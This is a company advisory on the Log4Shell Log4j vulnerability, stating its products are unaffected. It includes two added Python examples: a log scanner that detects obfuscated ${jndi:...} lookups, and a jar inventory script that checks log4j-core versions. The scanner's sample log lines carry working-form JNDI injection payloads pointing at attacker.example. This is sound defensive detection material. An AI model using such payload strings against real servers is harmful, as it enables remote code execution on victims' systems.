A serious vulnerability in a widely used logging library, Apache Log4j, was disclosed on Dec 9th 2021; it is tracked as CVE-2021-44228 and has been referred to as Log4Shell by some outlets. An additional vulnerability in the same library was disclosed on Dec 19th 2021.
What is this vulnerability?
A Remote Code Execution (RCE) vulnerability was discovered in the popular Java logging library Log4j (the 2.x branch). Log4j 2 expands lookup expressions of the form ${...} that appear in the text it logs, and one of those lookups, the JNDI lookup, fetches data from a remote directory service. An unauthenticated adversary who can get specially crafted text into something the application logs (a request header, a username, a chat message) can therefore make the system load and execute code from a server they control. This is a serious vulnerability that affects many software products and online services.
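The following is an added example and is not code from Delib or from the Log4j project. It shows what detecting this vulnerability in log data looks like: the attacker's string has to be written to a log, so the telltale is a ${jndi:...} lookup in logged input. Attackers quickly started hiding the jndi token behind nested lookups (${lower:j}, ${::-j}) and URL encoding, so a plain substring search misses much of it; the scanner below peels those layers first. The log lines, host names and addresses are constructed for the example.

```python
"""Added example (not Delib's or Log4j's code): flag Log4Shell-style
lookup strings in log lines, including common obfuscated forms."""
import re
from urllib.parse import unquote

# Innermost ${...} that contains no further lookup.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What remains once obfuscation has been stripped away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _reduce_once(text: str) -> str:
    """Resolve one layer of innermost lookups whose result is static."""
    def repl(m):
        body = m.group(1)
        lowered = body.lower()
        if lowered.startswith("lower:"):          # ${lower:J} -> j
            return body[6:].lower()
        if lowered.startswith("upper:"):          # ${upper:j} -> J
            return body[6:].upper()
        if ":-" in body:                          # ${key:-default} -> default
            return body.split(":-", 1)[1]
        return m.group(0)                         # e.g. ${jndi:...} stays as is
    return _INNER.sub(repl, text)


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode (twice, for double encoding) and peel nested lookups
    until nothing more reduces or the round limit is hit."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        reduced = _reduce_once(text)
        if reduced == text:
            break
        text = reduced
    return text


def contains_jndi_lookup(line: str) -> bool:
    """True if the line carries a ${jndi:...} lookup, obfuscated or not."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for every suspicious line."""
    return [(i, normalize(line)) for i, line in enumerate(lines, 1)
            if contains_jndi_lookup(line)]


# Constructed sample access-log lines; attacker.example is a reserved name.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:09:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:09:12:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:09:12:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:09:12:11 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:09:13:00 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, norm in scan(SAMPLE_LOG):
        print(f"line {lineno}: {norm}")
```

The last sample line is there to show that an ordinary ${date:...} lookup is not flagged; the reduction only rewrites lookups whose value is fixed in the string itself, and leaves everything else alone so the final pattern match decides.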
How does this vulnerability affect Delib?
Delib does not use Apache Log4j in its products. Citizen Space, Dialogue and Simulator are not affected by this vulnerability.
An audit of the other tools and systems directly operated by Delib identified one tool that uses Log4j: Apache JMeter, which we use for internal testing in an isolated environment where pre-existing mitigations mean the Log4j vulnerability is not exploitable. Further mitigations have also been applied to this tool as a precaution.
We have confirmed that no other systems or software directly operated by Delib are affected.
However, like every other organisation, we use other products and services in the course of our work, so we activated our incident response process and immediately investigated the use of Log4j across our suppliers and vendors. We have contacted our third-party vendors and suppliers and, where they are exposed to this risk, we are working with our sub-processors and critical vendors to ensure they remediate any vulnerable systems of theirs that we rely on.
Any further updates will be published here.
What actions should I take?
There is nothing you need to do in relation to your use of Delib’s products and services.
Your IT/cyber security teams will no doubt be checking your own systems and other suppliers for exposure to this risk, and patching (upgrading to a fixed Log4j release) or otherwise remediating where necessary.
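As an added example of the check such a team runs on its own hosts (this is not Delib's code, and the jar files it scans are constructed stand-ins built in a temporary directory), the script below walks a directory tree, opens every jar/war/ear it finds, and reports the log4j-core version together with whether the JndiLookup class is present. Both facts matter: versions from 2.0-beta9 up to 2.14.x are affected, but Apache's documented stop-gap for builds that could not be upgraded was to delete JndiLookup.class from the jar, so an old version without that class has been mitigated and a version-only check would wrongly flag it. Archives nested inside a war are opened in memory, since that is where application servers keep their libraries.

```python
"""Added example (not Delib's code): find log4j-core archives on disk and
report version plus presence of the JNDI lookup class."""
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import Dict, Iterator, List, Optional, Tuple

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
FIXED = (2, 15, 0)  # first log4j-core release that closed the original hole


@dataclass
class Finding:
    path: str                 # archive path; "outer!inner" for nested jars
    version: Optional[str]
    has_jndi_lookup: bool

    @property
    def vulnerable(self) -> bool:
        """Lookup class present and version below 2.15.0 (or unknown)."""
        if not self.has_jndi_lookup:
            return False
        v = parse_version(self.version)
        return v is None or v < FIXED


def parse_version(text: Optional[str]) -> Optional[Tuple[int, int, int]]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparsable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def inspect_archive(zf: zipfile.ZipFile, label: str, depth: int = 0) -> Iterator[Finding]:
    """Yield a Finding if this archive is log4j-core, then recurse into any
    archives it contains (depth bound guards against pathological nesting)."""
    names = set(zf.namelist())
    if POM_PROPS in names or JNDI_CLASS in names:
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        yield Finding(label, version, JNDI_CLASS in names)
    if depth >= 3:
        return
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            yield from inspect_archive(inner, f"{label}!{name}", depth + 1)


def scan_tree(root: str) -> List[Finding]:
    """Walk a directory and inspect every archive under it, sorted by path."""
    found: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(ARCHIVE_EXT):
                continue
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            try:
                with zipfile.ZipFile(full) as zf:
                    found.extend(inspect_archive(zf, rel))
            except zipfile.BadZipFile:
                continue  # not really a zip despite the extension
    return sorted(found, key=lambda f: f.path)


# --- constructed sample data so the example runs offline -------------------

def make_jar(version: Optional[str], with_jndi: bool, extra: Optional[Dict[str, bytes]] = None) -> bytes:
    """Build a stand-in jar in memory (placeholder bytes, not a real class)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version:
            zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        for name, data in (extra or {}).items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_tree(root: str) -> None:
    """Four cases: affected, mitigated by class removal, fixed, nested in a war."""
    lib = os.path.join(root, "lib")
    os.makedirs(lib)
    samples = {
        os.path.join(lib, "log4j-core-2.14.1.jar"): make_jar("2.14.1", True),
        os.path.join(lib, "log4j-core-2.14.1-mitigated.jar"): make_jar("2.14.1", False),
        os.path.join(lib, "log4j-core-2.17.1.jar"): make_jar("2.17.1", True),
        os.path.join(lib, "other.jar"): make_jar(None, False, {"com/example/App.class": b"\x00"}),
        os.path.join(root, "app.war"): make_jar(None, False, {"WEB-INF/lib/log4j-core-2.13.0.jar": make_jar("2.13.0", True)}),
    }
    for path, data in samples.items():
        with open(path, "wb") as f:
            f.write(data)


def demo() -> List[Finding]:
    """Create the sample tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{'VULNERABLE' if f.vulnerable else 'ok        '} {f.version or '?':8} {f.path}")
```

Two caveats when running this for real: shaded or "fat" jars may relocate the Log4j packages to a different path, so a negative result from the path constants above is not proof of absence, and a jar that is on disk but never on a running JVM's classpath (or one loaded from a location the scan did not cover) is a question for the application owners, not the file system.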
Where can I find more information?
Additional information on this vulnerability can be found here: